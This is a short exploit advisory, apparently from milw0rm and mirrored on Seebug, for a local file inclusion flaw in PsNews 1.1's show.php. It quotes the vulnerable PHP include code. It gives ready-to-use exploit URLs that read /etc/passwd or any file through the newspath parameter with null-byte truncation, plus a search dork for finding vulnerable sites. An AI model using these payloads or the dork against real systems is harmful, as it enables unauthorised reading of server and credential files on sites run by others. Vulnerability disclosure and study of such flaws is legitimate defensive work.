# o [bug] /"*._ _ # # . . . .-*'` `*-.._.-'/ # # o o < * )) , ( # # . o `*-._`._(__.--*"`.\ # # # # vuln.: PsNews 1.1 (show.php newspath) Local File Inclusion # # author: irk4z@yahoo.pl # # download: # # http://www.strefaphp.net/index.php?page=download&what=download&fid=12 # # dork: "Powered by PsNews" ;] # /news/show.php: ... if(eregi("://", $newspath)){ die("Nieautoryzowany dostęp!"); } if(!isset($newspath)){ $newspath = "news"; } include("$newspath/functions.php"); ... # exploit: http://[site]/[path]/news/show.php?newspath=/etc/passwd%00 http://[site]/[path]/news/show.php?newspath=[file]%00 # greetz: cOndemned, DooMRiderZ vx team (great zin :D), polish underground :* # milw0rm.com [2007-07-12]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论